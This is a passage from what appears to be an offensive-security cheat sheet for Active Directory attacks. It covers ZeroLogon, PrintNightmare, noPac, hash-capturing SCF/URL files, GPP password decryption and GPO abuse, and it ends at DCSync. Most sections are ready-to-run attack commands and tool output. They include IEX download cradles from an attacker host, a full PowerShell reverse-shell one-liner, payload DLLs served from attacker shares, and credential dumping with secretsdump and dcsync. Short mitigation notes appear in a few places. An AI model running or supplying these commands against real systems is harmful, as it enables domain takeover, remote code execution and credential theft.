msfdc01.metasploitable.local... Done! + [+] Parsing TGS-REP from msfdc01.metasploitable.local... Done! + [+] Creating ccache file 'TGT_user01@metasploitable.local.ccache'... Done! +``` + +Then use `mimikatz` to load the ticket. + +```powershell +mimikatz.exe "kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache" +``` + + +#### Mitigations + +* Ensure the DCPromo process includes a patch QA step before running DCPromo that checks for installation of KB3011780. The quick and easy way to perform this check is with PowerShell: get-hotfix 3011780 + + +### ZeroLogon + +> CVE-2020-1472 + +White Paper from Secura : https://www.secura.com/pathtoimg.php?id=2055 + +Exploit steps from the white paper + +1. Spoofing the client credential +2. Disabling signing and sealing +3. Spoofing a call +4. Changing a computer's AD password to null +5. From password change to domain admin +6. 
:warning: reset the computer's AD password in a proper way to avoid any Deny of Service + +* `cve-2020-1472-exploit.py` - Python script from [dirkjanm](https://github.com/dirkjanm) + ```powershell + # Check (https://github.com/SecuraBV/CVE-2020-1472) + proxychains python3 zerologon_tester.py DC01 172.16.1.5 + + $ git clone https://github.com/dirkjanm/CVE-2020-1472.git + + # Activate a virtual env to install impacket + $ python3 -m venv venv + $ source venv/bin/activate + $ pip3 install . + + # Exploit the CVE (https://github.com/dirkjanm/CVE-2020-1472/blob/master/cve-2020-1472-exploit.py) + proxychains python3 cve-2020-1472-exploit.py DC01 172.16.1.5 + + # Find the old NT hash of the DC + proxychains secretsdump.py -history -just-dc-user 'DC01$' -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 'CORP/DC01$@DC01.CORP.LOCAL' + + # Restore password from secretsdump + # secretsdump will automatically dump the plaintext machine password (hex encoded) + # when dumping the local registry secrets on the newest version + python restorepassword.py CORP/DC01@DC01.CORP.LOCAL -target-ip 172.16.1.5 -hexpass e6ad4c4f64e71cf8c8020aa44bbd70ee711b8dce2adecd7e0d7fd1d76d70a848c987450c5be97b230bd144f3c3 + deactivate + ``` + +* `nccfsas` - .NET binary for Cobalt Strike's execute-assembly + ```powershell + git clone https://github.com/nccgroup/nccfsas + # Check + execute-assembly SharpZeroLogon.exe win-dc01.vulncorp.local + + # Resetting the machine account password + execute-assembly SharpZeroLogon.exe win-dc01.vulncorp.local -reset + + # Testing from a non Domain-joined machine + execute-assembly SharpZeroLogon.exe win-dc01.vulncorp.local -patch + + # Now reset the password back + ``` + +* `Mimikatz` - 2.2.0 20200917 Post-Zerologon + ```powershell + privilege::debug + # Check for the CVE + lsadump::zerologon /target:DC01.LAB.LOCAL /account:DC01$ + + # Exploit the CVE and set the computer account's password to "" + lsadump::zerologon /target:DC01.LAB.LOCAL /account:DC01$ /exploit + + # Execute 
dcsync to extract some hashes + lsadump::dcsync /domain:LAB.LOCAL /dc:DC01.LAB.LOCAL /user:krbtgt /authuser:DC01$ /authdomain:LAB /authpassword:"" /authntlm + lsadump::dcsync /domain:LAB.LOCAL /dc:DC01.LAB.LOCAL /user:Administrator /authuser:DC01$ /authdomain:LAB /authpassword:"" /authntlm + + # Pass The Hash with the extracted Domain Admin hash + sekurlsa::pth /user:Administrator /domain:LAB /rc4:HASH_NTLM_ADMIN + + # Use IP address instead of FQDN to force NTLM with Windows APIs + # Reset password to Waza1234/Waza1234/Waza1234/ + # https://github.com/gentilkiwi/mimikatz/blob/6191b5a8ea40bbd856942cbc1e48a86c3c505dd3/mimikatz/modules/kuhl_m_lsadump.c#L2584 + lsadump::postzerologon /target:10.10.10.10 /account:DC01$ + ``` + +* `CrackMapExec` - only check + ```powershell + crackmapexec smb 10.10.10.10 -u username -p password -d domain -M zerologon + ``` + +A 2nd approach to exploit zerologon is done by relaying authentication. + +This technique, [found by dirkjanm](https://dirkjanm.io/a-different-way-of-abusing-zerologon), requires more prerequisites but has the advantage of having no impact on service continuity. +The following prerequisites are needed: +* A domain account +* One DC running the `PrintSpooler` service +* Another DC vulnerable to zerologon + +* `ntlmrelayx` - from Impacket and any tool such as [`printerbug.py`](https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py) + ```powershell + # Check if one DC is running the PrintSpooler service + rpcdump.py 10.10.10.10 | grep -A 6 "spoolsv" + + # Setup ntlmrelay in one shell + ntlmrelayx.py -t dcsync://DC01.LAB.LOCAL -smb2support + + #Trigger printerbug in 2nd shell + python3 printerbug.py 'LAB.LOCAL'/joe:Password123@10.10.10.10 10.10.10.12 + ``` + +### PrintNightmare + +> CVE-2021-1675 / CVE-2021-34527 + +The DLL will be stored in `C:\Windows\System32\spool\drivers\x64\3\`. +The exploit will execute the DLL either from the local filesystem or a remote share. 
+ +Requirements: +* **Spooler Service** enabled (Mandatory) +* Server with patches < June 2021 +* DC with `Pre Windows 2000 Compatibility` group +* Server with registry key `HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows NT\Printers\PointAndPrint\NoWarningNoElevationOnInstall` = (DWORD) 1 +* Server with registry key `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA` = (DWORD) 0 + + +**Detect the vulnerability**: +* Impacket - [rpcdump](https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/rpcdump.py) + ```ps1 + python3 ./rpcdump.py @10.0.2.10 | egrep 'MS-RPRN|MS-PAR' + Protocol: [MS-RPRN]: Print System Remote Protocol + ``` +* [It Was All A Dream](https://github.com/byt3bl33d3r/ItWasAllADream) + ```ps1 + git clone https://github.com/byt3bl33d3r/ItWasAllADream + cd ItWasAllADream && poetry install && poetry shell + itwasalladream -u user -p Password123 -d domain 10.10.10.10/24 + docker run -it itwasalladream -u username -p Password123 -d domain 10.10.10.10 + ``` + +**Payload Hosting**: +* The payload can be hosted on Impacket SMB server since [PR #1109](https://github.com/SecureAuthCorp/impacket/pull/1109): +```ps1 +python3 ./smbserver.py share /tmp/smb/ +``` +* Using [Invoke-BuildAnonymousSMBServer](https://github.com/3gstudent/Invoke-BuildAnonymousSMBServer/blob/main/Invoke-BuildAnonymousSMBServer.ps1) (Admin rights required on host): +```ps1 +Import-Module .\Invoke-BuildAnonymousSMBServer.ps1; Invoke-BuildAnonymousSMBServer -Path C:\Share -Mode Enable +``` +* Using WebDav with [SharpWebServer](https://github.com/mgeeky/SharpWebServer) (Doesn't require admin rights): +```ps1 +SharpWebServer.exe port=8888 dir=c:\users\public verbose=true +``` +When using WebDav instead of SMB, you must add `@[PORT]` to the hostname in the URI, e.g.: `\\172.16.1.5@8888\Downloads\beacon.dll` +WebDav client **must** be activated on exploited target. 
By default it is not activated on Windows workstations (you have to `net start webclient`) and it's not installed on servers. Here is how to detect activated webdav: +```ps1 +cme smb -u user -p password -d domain.local -M webdav [TARGET] +``` + +**Trigger the exploit**: + +* [SharpNightmare](https://github.com/cube0x0/CVE-2021-1675) + ```powershell + # require a modified Impacket: https://github.com/cube0x0/impacket + python3 ./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 '\\192.168.1.215\smb\addCube.dll' + python3 ./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 'C:\addCube.dll' + ## LPE + SharpPrintNightmare.exe C:\addCube.dll + ## RCE using existing context + SharpPrintNightmare.exe '\\192.168.1.215\smb\addCube.dll' 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_addb31f9bff9e936\Amd64\UNIDRV.DLL' '\\192.168.1.20' + ## RCE using runas /netonly + SharpPrintNightmare.exe '\\192.168.1.215\smb\addCube.dll' 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL' '\\192.168.1.10' hackit.local domain_user Pass123 + ``` +* [Invoke-Nightmare](https://github.com/calebstewart/CVE-2021-1675) + ```powershell + ## LPE only (PS1 + DLL) + Import-Module .\cve-2021-1675.ps1 + Invoke-Nightmare # add user `adm1n`/`P@ssw0rd` in the local admin group by default + Invoke-Nightmare -DriverName "Dementor" -NewUser "d3m3nt0r" -NewPassword "AzkabanUnleashed123*" + Invoke-Nightmare -DLL "C:\absolute\path\to\your\bindshell.dll" + ``` +* [Mimikatz v2.2.0-20210709+](https://github.com/gentilkiwi/mimikatz/releases) + ```powershell + ## LPE + misc::printnightmare /server:DC01 /library:C:\Users\user1\Documents\mimispool.dll + ## RCE + misc::printnightmare /server:CASTLE /library:\\10.0.2.12\smb\beacon.dll /authdomain:LAB /authuser:Username /authpassword:Password01 /try:50 + ``` +* [PrintNightmare - @outflanknl](https://github.com/outflanknl/PrintNightmare) + ```powershell + PrintNightmare [target ip 
or hostname] [UNC path to payload Dll] [optional domain] [optional username] [optional password] + ``` + +**Debug informations** + +| Error | Message | Debug | +|--------|---------------------|------------------------------------------| +| 0x5 | `rpc_s_access_denied` | Permissions on the file in the SMB share | +| 0x525 | `ERROR_NO_SUCH_USER` | The specified account does not exist. | +| 0x180 | unknown error code | Share is not SMB2 | + + +### samAccountName spoofing + +> During S4U2Self, the KDC will try to append a '\$' to the computer name specified in the TGT, if the computer name is not found. An attacker can create a new machine account with the sAMAccountName set to a domain controller's sAMAccountName - without the '\$'. For instance, suppose there is a domain controller with a sAMAccountName set to 'DC\$'. An attacker would then create a machine account with the sAMAccountName set to 'DC'. The attacker can then request a TGT for the newly created machine account. After the TGT has been issued by the KDC, the attacker can rename the newly created machine account to something different, e.g. JOHNS-PC. The attacker can then perform S4U2Self and request a ST to itself as any user. Since the machine account with the sAMAccountName set to 'DC' has been renamed, the KDC will try to find the machine account by appending a '$', which will then match the domain controller. The KDC will then issue a valid ST for the domain controller. + +**Requirements** + +* MachineAccountQuota > 0 + +**Check for exploitation** + +0. Check the MachineAccountQuota of the account + ```powershell + crackmapexec ldap 10.10.10.10 -u username -p 'Password123' -d 'domain.local' --kdcHost 10.10.10.10 -M MAQ + StandIn.exe --object ms-DS-MachineAccountQuota=* + ``` +1. Check if the DC is vulnerable + ```powershell + crackmapexec smb 10.10.10.10 -u '' -p '' -d domain -M nopac + ``` + +**Exploitation** + +0. 
Create a computer account + ```powershell + impacket@linux> addcomputer.py -computer-name 'ControlledComputer$' -computer-pass 'ComputerPassword' -dc-host DC01 -domain-netbios domain 'domain.local/user1:complexpassword' + + powermad@windows> . .\Powermad.ps1 + powermad@windows> $password = ConvertTo-SecureString 'ComputerPassword' -AsPlainText -Force + powermad@windows> New-MachineAccount -MachineAccount "ControlledComputer" -Password $($password) -Domain "domain.local" -DomainController "DomainController.domain.local" -Verbose + + sharpmad@windows> Sharpmad.exe MAQ -Action new -MachineAccount ControlledComputer -MachinePassword ComputerPassword + ``` +1. Clear the controlled machine account `servicePrincipalName` attribute + ```ps1 + impacket@linux> addspn.py -u 'domain\user' -p 'password' -t 'ControlledComputer$' -c DomainController + + powershell@windows> . .\Powerview.ps1 + powershell@windows> Set-DomainObject "CN=ControlledComputer,CN=Computers,DC=domain,DC=local" -Clear 'serviceprincipalname' -Verbose + ``` +2. (CVE-2021-42278) Change the controlled machine account `sAMAccountName` to a Domain Controller's name without the trailing `$` + ```ps1 + # https://github.com/SecureAuthCorp/impacket/pull/1224 + impacket@linux> renameMachine.py -current-name 'ControlledComputer$' -new-name 'DomainController' -dc-ip 'DomainController.domain.local' 'domain.local'/'user':'password' + + powermad@windows> Set-MachineAccountAttribute -MachineAccount "ControlledComputer" -Value "DomainController" -Attribute samaccountname -Verbose + ``` +3. Request a TGT for the controlled machine account + ```ps1 + impacket@linux> getTGT.py -dc-ip 'DomainController.domain.local' 'domain.local'/'DomainController':'ComputerPassword' + + cmd@windows> Rubeus.exe asktgt /user:"DomainController" /password:"ComputerPassword" /domain:"domain.local" /dc:"DomainController.domain.local" /nowrap + ``` +4. 
Reset the controlled machine account sAMAccountName to its old value + ```ps1 + impacket@linux> renameMachine.py -current-name 'DomainController' -new-name 'ControlledComputer$' 'domain.local'/'user':'password' + + powermad@windows> Set-MachineAccountAttribute -MachineAccount "ControlledComputer" -Value "ControlledComputer" -Attribute samaccountname -Verbose + ``` +5. (CVE-2021-42287) Request a service ticket with `S4U2self` by presenting the TGT obtained before + ```ps1 + # https://github.com/SecureAuthCorp/impacket/pull/1202 + impacket@linux> KRB5CCNAME='DomainController.ccache' getST.py -self -impersonate 'DomainAdmin' -spn 'cifs/DomainController.domain.local' -k -no-pass -dc-ip 'DomainController.domain.local' 'domain.local'/'DomainController' + + cmd@windows> Rubeus.exe s4u /self /impersonateuser:"DomainAdmin" /altservice:"ldap/DomainController.domain.local" /dc:"DomainController.domain.local" /ptt /ticket:[Base64 TGT] + ``` +6. DCSync: `KRB5CCNAME='DomainAdmin.ccache' secretsdump.py -just-dc-user 'krbtgt' -k -no-pass -dc-ip 'DomainController.domain.local' @'DomainController.domain.local'` + +Automated exploitation: + +* [cube0x0/noPac](https://github.com/cube0x0/noPac) - Windows + ```powershell + noPac.exe scan -domain htb.local -user user -pass 'password123' + noPac.exe -domain htb.local -user domain_user -pass 'Password123!' /dc dc.htb.local /mAccount demo123 /mPassword Password123! /service cifs /ptt + noPac.exe -domain htb.local -user domain_user -pass "Password123!" /dc dc.htb.local /mAccount demo123 /mPassword Password123! 
/service ldaps /ptt /impersonate Administrator + ``` +* [Ridter/noPac](https://github.com/Ridter/noPac) - Linux + ```ps1 + python noPac.py 'domain.local/user' -hashes ':31d6cfe0d16ae931b73c59d7e0c089c0' -dc-ip 10.10.10.10 -use-ldap -dump + ``` +* [WazeHell/sam-the-admin](https://github.com/WazeHell/sam-the-admin) + ```ps1 + $ python3 sam_the_admin.py "domain/user:password" -dc-ip 10.10.10.10 -shell + [*] Selected Target dc.caltech.white + [*] Total Domain Admins 11 + [*] will try to impersonat gaylene.dreddy + [*] Current ms-DS-MachineAccountQuota = 10 + [*] Adding Computer Account "SAMTHEADMIN-11$" + [*] MachineAccount "SAMTHEADMIN-11$" password = EhFMT%mzmACL + [*] Successfully added machine account SAMTHEADMIN-11$ with password EhFMT%mzmACL. + [*] SAMTHEADMIN-11$ object = CN=SAMTHEADMIN-11,CN=Computers,DC=caltech,DC=white + [*] SAMTHEADMIN-11$ sAMAccountName == dc + [*] Saving ticket in dc.ccache + [*] Resting the machine account to SAMTHEADMIN-11$ + [*] Restored SAMTHEADMIN-11$ sAMAccountName to original value + [*] Using TGT from cache + [*] Impersonating gaylene.dreddy + [*] Requesting S4U2self + [*] Saving ticket in gaylene.dreddy.ccache + [!] Launching semi-interactive shell - Careful what you execute + C:\Windows\system32>whoami + nt authority\system + ``` +* [ly4k/Pachine](https://github.com/ly4k/Pachine) + ```powershell + usage: pachine.py [-h] [-scan] [-spn SPN] [-impersonate IMPERSONATE] [-domain-netbios NETBIOSNAME] [-computer-name NEW-COMPUTER-NAME$] [-computer-pass password] [-debug] [-method {SAMR,LDAPS}] [-port {139,445,636}] [-baseDN DC=test,DC=local] + [-computer-group CN=Computers,DC=test,DC=local] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] -dc-host hostname [-dc-ip ip] + [domain/]username[:password] + $ python3 pachine.py -dc-host dc.domain.local -scan 'domain.local/john:Passw0rd!' + $ python3 pachine.py -dc-host dc.domain.local -spn cifs/dc.domain.local -impersonate administrator 'domain.local/john:Passw0rd!' 
+ $ export KRB5CCNAME=$PWD/administrator@domain.local.ccache + $ impacket-psexec -k -no-pass 'domain.local/administrator@dc.domain.local' + ``` + +**Mitigations**: +* [KB5007247 - Windows Server 2012 R2](https://support.microsoft.com/en-us/topic/november-9-2021-kb5007247-monthly-rollup-2c3b6017-82f4-4102-b1e2-36f366bf3520) +* [KB5008601 - Windows Server 2016](https://support.microsoft.com/en-us/topic/november-14-2021-kb5008601-os-build-14393-4771-out-of-band-c8cd33ce-3d40-4853-bee4-a7cc943582b9) +* [KB5008602 - Windows Server 2019](https://support.microsoft.com/en-us/topic/november-14-2021-kb5008602-os-build-17763-2305-out-of-band-8583a8a3-ebed-4829-b285-356fb5aaacd7) +* [KB5007205 - Windows Server 2022](https://support.microsoft.com/en-us/topic/november-9-2021-kb5007205-os-build-20348-350-af102e6f-cc7c-4cd4-8dc2-8b08d73d2b31) +* [KB5008102](https://support.microsoft.com/en-us/topic/kb5008102-active-directory-security-accounts-manager-hardening-changes-cve-2021-42278-5975b463-4c95-45e1-831a-d120004e258e) +* [KB5008380](https://support.microsoft.com/en-us/topic/kb5008380-authentication-updates-cve-2021-42287-9dafac11-e0d0-4cb8-959a-143bd0201041) + + +## Open Shares + +> Some shares can be accessible without authentication, explore them to find some juicy files + +* [ShawnDEvans/smbmap - a handy SMB enumeration tool](https://github.com/ShawnDEvans/smbmap) + ```powershell + smbmap -H 10.10.10.10 # null session + smbmap -H 10.10.10.10 -R # recursive listing + smbmap -H 10.10.10.10 -u invaliduser # guest smb session + smbmap -H 10.10.10.10 -d "DOMAIN.LOCAL" -u "USERNAME" -p "Password123*" + ``` + +* [byt3bl33d3r/pth-smbclient from path-toolkit](https://github.com/byt3bl33d3r/pth-toolkit) + ```powershell + pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/Share + pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/C$ + ls # list files + cd # move inside a folder + get # download files + 
put # replace a file + ``` + +* [SecureAuthCorp/smbclient from Impacket](https://github.com/SecureAuthCorp/impacket) + ```powershell + smbclient -I 10.10.10.100 -L ACTIVE -N -U "" + Sharename Type Comment + --------- ---- ------- + ADMIN$ Disk Remote Admin + C$ Disk Default share + IPC$ IPC Remote IPC + NETLOGON Disk Logon server share + Replication Disk + SYSVOL Disk Logon server share + Users Disk + use Sharename # select a Sharename + cd Folder # move inside a folder + ls # list files + ``` + +* [smbclient - from Samba, ftp-like client to access SMB/CIFS resources on servers](#) + ```powershell + smbclient -U username //10.0.0.1/SYSVOL + smbclient //10.0.0.1/Share + + # Download a folder recursively + smb: \> mask "" + smb: \> recurse ON + smb: \> prompt OFF + smb: \> lcd '/path/to/go/' + smb: \> mget * + ``` + + +* [SnaffCon/Snaffler - a tool for pentesters to help find delicious candy](https://github.com/SnaffCon/Snaffler) + ```ps1 + snaffler.exe -s - snaffler.log + + # Snaffle all the computers in the domain + ./Snaffler.exe -d domain.local -c -s + + # Snaffle specific computers + ./Snaffler.exe -n computer1,computer2 -s + ​ + # Snaffle a specific directory + ./Snaffler.exe -i C:\ -s + ``` + + +## SCF and URL file attack against writeable share + +Theses attacks can be automated with [Farmer.exe](https://github.com/mdsecactivebreach/Farmer) and [Crop.exe](https://github.com/mdsecactivebreach/Farmer/tree/main/crop) + +```ps1 +# Farmer to receive auth +farmer.exe [seconds] [output] +farmer.exe 8888 0 c:\windows\temp\test.tmp # undefinitely +farmer.exe 8888 60 # one minute + +# Crop can be used to create various file types that will trigger SMB/WebDAV connections for poisoning file shares during hash collection attacks +crop.exe [options] +Crop.exe \\\\fileserver\\common mdsec.url \\\\workstation@8888\\mdsec.ico +Crop.exe \\\\fileserver\\common mdsec.library-ms \\\\workstation@8888\\mdsec +``` + +### SCF Files + +Drop the following `@something.scf` file inside a 
share and start listening with Responder : `responder -wrf --lm -v -I eth0` + +```powershell +[Shell] +Command=2 +IconFile=\\10.10.10.10\Share\test.ico +[Taskbar] +Command=ToggleDesktop +``` + +Using [`crackmapexec`](https://github.com/mpgn/CrackMapExec/blob/master/cme/modules/slinky.py): + +```ps1 +crackmapexec smb 10.10.10.10 -u username -p password -M scuffy -o NAME=WORK SERVER=IP_RESPONDER #scf +crackmapexec smb 10.10.10.10 -u username -p password -M slinky -o NAME=WORK SERVER=IP_RESPONDER #lnk +crackmapexec smb 10.10.10.10 -u username -p password -M slinky -o NAME=WORK SERVER=IP_RESPONDER CLEANUP +``` + +### URL Files + +This attack also works with `.url` files and `responder -I eth0 -v`. + +```powershell +[InternetShortcut] +URL=whatever +WorkingDirectory=whatever +IconFile=\\10.10.10.10\%USERNAME%.icon +IconIndex=1 +``` + +### Windows Library Files + +> Windows Library Files (.library-ms) + +```xml + + + @windows.storage.dll,-34582 + 6 + true + imageres.dll,-1003 + + {7d49d726-3c21-4f05-99aa-fdc2c9474656} + + + + true + false + + \\\\workstation@8888\\folder + + + + +``` + +### Windows Search Connectors Files + +> Windows Search Connectors (.searchConnector-ms) + +```xml + + + imageres.dll,-1002 + Microsoft Outlook + false + true + \\\\workstation@8888\\folder.ico + + {91475FE5-586B-4EBA-8D75-D17434B8CDF6} + + + \\\\workstation@8888\\folder + + +``` + + +## Passwords in SYSVOL & Group Policy Preferences + +Find password in SYSVOL (MS14-025). SYSVOL is the domain-wide share in Active Directory to which all authenticated users have read access. All domain Group Policies are stored here: `\\\SYSVOL\\Policies\`. 
+ +```powershell +findstr /S /I cpassword \\\sysvol\\policies\*.xml +``` + +Decrypt a Group Policy Password found in SYSVOL (by [0x00C651E0](https://twitter.com/0x00C651E0/status/956362334682849280)), using the 32-byte AES key provided by Microsoft in the [MSDN - 2.2.1.1.4 Password Encryption](https://msdn.microsoft.com/en-us/library/cc422924.aspx) + +```bash +echo 'password_in_base64' | base64 -d | openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0000000000000000 + +e.g: +echo '5OPdEKwZSf7dYAvLOe6RzRDtcvT/wCP8g5RqmAgjSso=' | base64 -d | openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0000000000000000 + +echo 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ' | base64 -d | openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0000000000000000 +``` + +### Automate the SYSVOL and passwords research + +* `Metasploit` modules to enumerate shares and credentials + ```c + scanner/smb/smb_enumshares + post/windows/gather/enum_shares + post/windows/gather/credentials/gpp + ``` + +* CrackMapExec modules + ```powershell + cme smb 10.10.10.10 -u Administrator -H 89[...]9d -M gpp_autologin + cme smb 10.10.10.10 -u Administrator -H 89[...]9d -M gpp_password + ``` + +* [Get-GPPPassword](https://github.com/SecureAuthCorp/impacket/blob/master/examples/Get-GPPPassword.py) + ```powershell + # with a NULL session + Get-GPPPassword.py -no-pass 'DOMAIN_CONTROLLER' + + # with cleartext credentials + Get-GPPPassword.py 'DOMAIN'/'USER':'PASSWORD'@'DOMAIN_CONTROLLER' + + # pass-the-hash + Get-GPPPassword.py -hashes 'LMhash':'NThash' 'DOMAIN'/'USER':'PASSWORD'@'DOMAIN_CONTROLLER' + ``` + +### Mitigations + +* Install [KB2962486](https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2014/ms14-025) on every computer used to manage GPOs which prevents new credentials from being placed in Group 
Policy Preferences. +* Delete existing GPP xml files in SYSVOL containing passwords. +* Don’t put passwords in files that are accessible by all authenticated users. + +## Exploit Group Policy Objects GPO + +> Creators of a GPO are automatically granted explicit Edit settings, delete, modify security, which manifests as CreateChild, DeleteChild, Self, WriteProperty, DeleteTree, Delete, GenericRead, WriteDacl, WriteOwner + +:triangular_flag_on_post: GPO Priorization : Organization Unit > Domain > Site > Local + +GPO are stored in the DC in `\\\SYSVOL\\Policies\\`, inside two folders **User** and **Machine**. +If you have the right to edit the GPO you can connect to the DC and replace the files. Planned Tasks are located at `Machine\Preferences\ScheduledTasks`. + +:warning: Domain members refresh group policy settings every 90 minutes with a random offset of 0 to 30 minutes but it can locally be forced with the following command: `gpupdate /force`. + +### Find vulnerable GPO + +Look a GPLink where you have the **Write** right. 
+ +```powershell +Get-DomainObjectAcl -Identity "SuperSecureGPO" -ResolveGUIDs | Where-Object {($_.ActiveDirectoryRights.ToString() -match "GenericWrite|AllExtendedWrite|WriteDacl|WriteProperty|WriteMember|GenericAll|WriteOwner")} +``` + +### Abuse GPO with SharpGPOAbuse + +```powershell +# Build and configure SharpGPOAbuse +$ git clone https://github.com/FSecureLABS/SharpGPOAbuse +$ Install-Package CommandLineParser -Version 1.9.3.15 +$ ILMerge.exe /out:C:\SharpGPOAbuse.exe C:\Release\SharpGPOAbuse.exe C:\Release\CommandLine.dll + +# Adding User Rights +.\SharpGPOAbuse.exe --AddUserRights --UserRights "SeTakeOwnershipPrivilege,SeRemoteInteractiveLogonRight" --UserAccount bob.smith --GPOName "Vulnerable GPO" + +# Adding a Local Admin +.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount bob.smith --GPOName "Vulnerable GPO" + +# Configuring a User or Computer Logon Script +.\SharpGPOAbuse.exe --AddUserScript --ScriptName StartupScript.bat --ScriptContents "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO" + +# Configuring a Computer or User Immediate Task +# /!\ Intended to "run once" per GPO refresh, not run once per system +.\SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO" +.\SharpGPOAbuse.exe --AddComputerTask --GPOName "VULNERABLE_GPO" --Author 'LAB.LOCAL\User' --TaskName "EvilTask" --Arguments "/c powershell.exe -nop -w hidden -enc BASE64_ENCODED_COMMAND " --Command "cmd.exe" --Force +``` + +### Abuse GPO with PowerGPOAbuse + +* https://github.com/rootSySdk/PowerGPOAbuse + +```ps1 +PS> . 
.\PowerGPOAbuse.ps1 + +# Adding a localadmin +PS> Add-LocalAdmin -Identity 'Bobby' -GPOIdentity 'SuperSecureGPO' + +# Assign a new right +PS> Add-UserRights -Rights "SeLoadDriverPrivilege","SeDebugPrivilege" -Identity 'Bobby' -GPOIdentity 'SuperSecureGPO' + +# Adding a New Computer/User script +PS> Add-ComputerScript/Add-UserScript -ScriptName 'EvilScript' -ScriptContent $(Get-Content evil.ps1) -GPOIdentity 'SuperSecureGPO' + +# Create an immediate task +PS> Add-GPOImmediateTask -TaskName 'eviltask' -Command 'powershell.exe /c' -CommandArguments "'$(Get-Content evil.ps1)'" -Author Administrator -Scope Computer/User -GPOIdentity 'SuperSecureGPO' +``` + +### Abuse GPO with pyGPOAbuse + +```powershell +$ git clone https://github.com/Hackndo/pyGPOAbuse + +# Add john user to local administrators group (Password: H4x00r123..) +./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012" + +# Reverse shell example +./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012" \ + -powershell \ + -command "\$client = New-Object System.Net.Sockets.TCPClient('10.20.0.2',1234);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()" \ + -taskname "Completely Legit Task" \ + -description "Dis is legit, pliz no delete" \ + -user +``` + +### Abuse GPO with PowerView + +```powershell +# Enumerate GPO +Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name} + +# New-GPOImmediateTask to push an Empire stager out to machines via VulnGPO +New-GPOImmediateTask -TaskName Debugging -GPODisplayName VulnGPO -CommandArguments '-NoP -NonI -W 
Hidden -Enc AAAAAAA...' -Force +``` + +### Abuse GPO with StandIn + +```powershell +# Add a local administrator +StandIn.exe --gpo --filter Shards --localadmin user002 + +# Set custom right to a user +StandIn.exe --gpo --filter Shards --setuserrights user002 --grant "SeDebugPrivilege,SeLoadDriverPrivilege" + +# Execute a custom command +StandIn.exe --gpo --filter Shards --tasktype computer --taskname Liber --author "REDHOOK\Administrator" --command "C:\I\do\the\thing.exe" --args "with args" +``` + +## Dumping AD Domain Credentials + +You will need the following files to extract the ntds : +- NTDS.dit file +- SYSTEM hive (`C:\Windows\System32\SYSTEM`) + +Usually you can find the ntds in two locations : `systemroot\NTDS\ntds.dit` and `systemroot\System32\ntds.dit`. +- `systemroot\NTDS\ntds.dit` stores the database that is in use on a domain controller. It contains the values for the domain and a replica of the values for the forest (the Configuration container data). +- `systemroot\System32\ntds.dit` is the distribution copy of the default directory that is used when you install Active Directory on a server running Windows Server 2003 or later to create a domain controller. Because this file is available, you can run the Active Directory Installation Wizard without having to use the server operating system CD. + +However you can change the location to a custom one, you will need to query the registry to get the current location. + +```powershell +reg query HKLM\SYSTEM\CurrentControlSet\Services\NTDS\Parameters /v "DSA Database file" +``` + +### DCSync Attack + +DCSync is a technique used by attackers to obtain sensitive information, including password hashes, from a domain controller in an Active Directory environment. Any member of Administrators, Domain Admins, or Enterprise Admins as well as Domain Controller computer accounts are able to run DCSync to pull password data. 
